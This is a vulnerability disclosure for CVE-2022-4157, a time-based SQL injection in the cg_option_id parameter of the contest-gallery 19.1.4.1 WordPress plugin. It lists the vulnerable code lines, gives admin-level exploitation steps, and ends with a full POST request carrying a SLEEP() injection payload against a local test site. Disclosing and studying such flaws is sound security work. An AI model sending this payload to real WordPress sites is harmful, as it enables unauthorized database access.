contest-gallery 19.1.4.1 WordPress plug-in SQL injection
Vulnerability Metadata
Key | Value |
---|---|
Date of Disclosure | December 05 2022 |
Affected Software | contest-gallery |
Affected Software Type | WordPress plugin |
Version | 19.1.4.1 |
Weakness | SQL Injection |
CWE ID | CWE-89 |
CVE ID | CVE-2022-4157 |
CVSS 3.x Base Score | n/a |
CVSS 2.0 Base Score | n/a |
Reporter | Kunal Sharma, Daniel Krohmer |
Reporter Contact | k_sharma19@informatik.uni-kl.de |
Link to Affected Software | https://wordpress.org/plugins/contest-gallery/ |
Link to Vulnerability DB | https://nvd.nist.gov/vuln/detail/CVE-2022-4157 |
Vulnerability Description
The cg_option_id
POST query parameter in contest-gallery 19.1.4.1 is vulnerable to SQL Injection. An authenticated attacker may abuse the Export all votes functionality in cg_votes_csv_export_all
function inside export-votes-all.php
. This leads to a threat actor crafting a malicious POST request.
Exploitation Guide
Login as admin
user. This attack requires at least admin
privileges.
Create a New Gallery, if no gallery was created before.
Change the Gallery name.
Click on Edit gallery
.
Click Export all votes
Clicking Export all votes
triggers the vulnerable request, the cg_option_id
POST parameter is the vulnerable query parameter.
A POC may look like the following request:
In the application code, the vulnerability is triggered by un-sanitized user input of cg_option_id
at line 19
in ./v10/v10-admin/export/export-votes-all.php
.
At lines 54-60
in ./v10/v10-admin/export/export-votes-all.php
the database query call on $GalleryID
leads to SQL Injection.
At lines 99-110
in ./v10/v10-admin/export/export-votes-all.php
the vulnerable input is again passed to variable- $queryString
.
At line 112
in ./v10/v10-admin/export/export-images-data.php
the database query call on $GalleryID
leads to SQL Injection.
Exploit Payload
Please note that cookies and nonces need to be changed according to your user settings, otherwise the exploit will not work.
Since the vulnerable query parameter cg_option_id
is passed to two database queries, we can notice the sleep time of the request being four times(4 invocation) the given argument inSLEEP()
*(~12,000 milliseconds here as SLEEP(3)).
The SQL injection can be triggered by sending the request below:
POST /wp-admin/admin.php?page=contest-gallery/index.php&option_id=1&cg_export_votes=true HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:106.0) Gecko/20100101 Firefox/106.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost:8080/wp-admin/admin.php?page=contest-gallery%2Findex.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 106
Origin: http://localhost:8080
Connection: close
Cookie: wordpress_37d007a56d816107ce5b52c10342db37=kaiba%7C1668483239%7CK8EB5hjVfjEvvJBQHeOyVpkJ8eKTSgY1ZwNZ9Gu6mIr%7Cafb735282dd2e1aeaff1d135419c00400e4e0e2a1d85809d6b54f126cfcd1883; wp-settings-time-2=1667954049; wordpress_test_cookie=WP%20Cookie%20check; wp_lang=en_US; wordpress_logged_in_37d007a56d816107ce5b52c10342db37=kaiba%7C1668483239%7CK8EB5hjVfjEvvJBQHeOyVpkJ8eKTSgY1ZwNZ9Gu6mIr%7C7ebf6c23f43d24912558008e7e934286452154ec3874ac04b09a1f136b885df3; wp-settings-1=mfold%3Do%26libraryContent%3Dbrowse; wp-settings-time-1=1668310439
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
cg_export_votes=true&cg_export_votes_all=true&cg_option_id=1+AND+(SELECT+7394+FROM+(SELECT(SLEEP(3)))UrUZ)